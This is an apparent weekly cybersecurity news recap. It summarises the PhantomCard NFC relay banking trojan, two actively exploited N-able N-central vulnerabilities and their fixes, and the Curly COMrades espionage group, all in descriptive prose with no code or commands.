⚡ Weekly Recap: NFC Fraud Trends, Curly COMrades Insights, N-able Vulnerabilities, Docker Backdoor Threats & More

Power does not simply vanish in a single breach; it gradually erodes through overlooked details—a missed patch, an incorrect setting, or an unmonitored system. Security failures typically do not occur all at once; they deteriorate slowly before culminating in a sudden collapse. Maintaining safety is less about possessing exhaustive knowledge and more about responding swiftly and decisively to prevent issues from accumulating. Clarity fosters control, while hesitation introduces risk. This week’s signals highlight critical areas where immediate action is essential.

The Threat of the Week involves Ghost Tap NFC-Based Mobile Fraud, with a new Android trojan named PhantomCard exploiting near-field communication (NFC) to execute relay attacks targeting banking customers in Brazil. In these incidents, users who install the malicious applications are prompted to place their credit or debit card on the back of their phone for verification. However, the card data is transmitted to an attacker-controlled NFC relay server. The stolen information is then relayed to money mules, who link it to contactless payment systems such as Apple Pay or Google Pay to acquire physical goods. Additionally, the importance of addressing Infrastructure-as-Code (IaC) misconfigurations is emphasised, as even minor errors can lead to significant production risks. A best practices guide is available to assist in rectifying these misconfigurations from the outset, ensuring a secure cloud environment.

In Top News, two security flaws affecting N-able N-central have been actively exploited in the wild. The vulnerabilities, CVE-2025-8875 and CVE-2025-8876, permit command execution and command injection, respectively. These issues have been resolved in N-central versions 2025.3.1 and 2024.6 HF2, released on August 13, 2025. N-able has urged customers to enable multi-factor authentication (MFA), particularly for administrative accounts. Furthermore, a new Advanced Persistent Threat (APT) group, dubbed Curly COMrades, has been identified targeting entities in Georgia and Moldova as part of a cyber espionage campaign aimed at establishing long-term access to targeted networks. This activity, monitored by a Romanian cybersecurity firm since mid-2024, has focused on judicial and government bodies in Georgia, as well as an energy distribution company in Moldova. Curly COMrades are believed to operate in alignment with Russia’s geopolitical objectives, deriving their name from their heavy reliance on the curl utility for command-and-control (C2) and data transfer, alongside the hijacking of Component Object Model (COM) objects. Persistent access to infected endpoints is achieved through a bespoke backdoor. 

Categories: Cybersecurity Threats, Cloud Security Best Practices, Vulnerability Exploitation 

Tags: Power, Security, Fraud, Malware, NFC, Misconfigurations, Authentication, Espionage, Access, Cloud